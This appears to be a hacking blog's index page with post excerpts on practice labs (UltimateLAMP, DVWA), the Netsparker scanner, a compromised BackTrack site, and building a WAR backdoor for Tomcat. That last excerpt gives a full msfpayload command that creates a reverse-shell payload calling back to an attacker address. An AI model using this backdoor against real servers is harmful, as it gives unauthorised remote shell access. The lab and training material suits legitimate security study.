Need Something To Hack?
Finally, after 2 months of wildness life (prepare my team {the 9 tails team} for Gemastik 2011 Hacking Contest, with 24h of craziest training I’ve ever made!), it’s time for me to have a little break in here. Today post is about hacking lab stuff. In case you need to search for hacking lab for you training, you might give a try on this list. Happy hacking ! UltimateLAMP UltimateLAMP is a Ubuntu VM running vulnerable services and containing weak accounts. The UltimateLAMP VM runs the following services:Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki,...
read moreCreate a WAR backdoor with Metasploit
Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Length: 71 Options: {“LHOST”=>”172.16.96.1″} [stextbox id="info"]it will create a WAR file contain a random name for jsp backdoor file[/stextbox] 2. Upload the WAR file. 3. Use netcat to...
read moreBackTrack Site Compromised
Wooowww…. Gile… Kalo site sekelas backtrack saja bisa di “miliki”… bagaimana dengan situs yang lainnya…?? (pengen tau jadinya attack vectornya.. ) untuk info lebih lanjut click link ini
read moreNetsparker
Netsparker adalah sebuah sebuah web application security scanner tool, yang dapat membantu anda dalam melakukan pencarian celah keamana pada sebuah web. keunggulan dari program buatan Mavituna Security ini adalah, tool ini dapat melakukan uji coba terhadap kesalahan(bug) yang di temukannya, sehingga mencegah terjadinya peringatan yang salah terhadap sebuah celah keamanan yang ditemukan. Selain versi berbayar, Netsparker juga hadir dalam versi gratis. ...
read moreDVWA: Damn Vulnerable Web App
DVWA adalah aplikasi yang ditujukan untuk para Security Profesional untuk melakukan test terhadap skill yang mereka miliki, DVWA juga cocok bagi anda yang ingin mempelajari beberapa tehnik web-hacking terhadap aplikasi PHP/MySQL, seperti SQL injection, Remote Command Execution, dll. DVWA juga cocok bagi para pembuat web untuk lebih memahami bagaimana cara mengamankan web yang mereka buat, karena selain mempelajari web-hacking, melalui DVWA kita juga bisa mempelajari bagaimana mencegah web-hacking terjadi pada aplikasi web yang kita miliki, dengan mempelajari sourcecode yang bisa kita lihat...
read more